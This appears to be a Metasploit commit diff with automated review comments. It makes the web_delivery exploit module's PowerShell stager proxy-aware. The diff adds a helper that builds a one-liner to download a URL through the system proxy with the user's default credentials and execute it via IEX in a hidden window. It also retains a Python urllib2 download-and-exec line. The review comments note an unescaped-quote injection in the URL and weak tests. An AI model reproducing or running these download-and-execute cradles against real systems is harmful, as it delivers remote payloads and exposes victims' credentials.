Make web_delivery proxy aware

Meatballs 2015-09-23 20:45:51 +01:00
parent 44fa188e71
commit 66c9222968
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
3 changed files with 27 additions and 1 deletions


@ -72,6 +72,22 @@ module Powershell
def self.ignore_ssl_certificate def self.ignore_ssl_certificate
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};' '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
end end
#
# Use the default system web proxy and credentials to download a URL
# as a string and execute the contents as PowerShell
#
# @param url [String] string to download
#
# @return [String] PowerShell code to download a URL
def self.proxy_aware_download_and_exec_string(url)
var = Rex::Text.rand_text_alpha(1)
cmd = "$#{var}=new-object net.webclient;"
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
cmd << "IEX $#{var}.downloadstring('#{url}');"
cmd
end
end end
end end
end end
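Review bot: `url` is interpolated unescaped into a single-quoted PowerShell literal on the `downloadstring('#{url}')` line, so a value containing `'` closes the literal early and the remainder is parsed as code. Now that this is a shared helper rather than an inline string in one module, it should either escape the value, e.g. `safe_url = url.gsub("'", "''")` and interpolate `safe_url`, or state in the `@param` text that callers must pass an already-validated URL. The `@param` description "string to download" is also vague; `# @param url [String] URL whose contents are downloaded and executed` says what the argument is. The header comment could additionally state that the generated code presents the logged-on user's default credentials to the system proxy, since that side effect is not obvious from the method name.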


@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
when 'PSH' when 'PSH'
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))" download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
download_and_run = "#{ignore_cert}#{download_string}"
print_line generate_psh_command_line( print_line generate_psh_command_line(
noprofile: true, noprofile: true,
windowstyle: 'hidden', windowstyle: 'hidden',


@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
script.include?('Get-QADComputer').should be_truthy script.include?('Get-QADComputer').should be_truthy
end end
end end
describe "::proxy_aware_download_and_exec_string" do
it 'should return some powershell' do
url = 'http://blah'
script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
script.should be
script.include?(url).should be_truthy
script.downcase.include?('downloadstring').should be_truthy
end
end
end end
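Review bot: The new example never checks the proxy behaviour this method exists for; it passes for any string containing the URL and `downloadstring`, which the previous non-proxy one-liner would also satisfy. Adding `script.include?('GetSystemWebProxy').should be_truthy` and `script.include?('DefaultCredentials').should be_truthy` would pin the two statements that distinguish this helper. `script.should be` only asserts truthiness and adds nothing beyond the `include?` checks. The enclosing `describe Rex::Powershell::PshMethods` block starts outside the hunk.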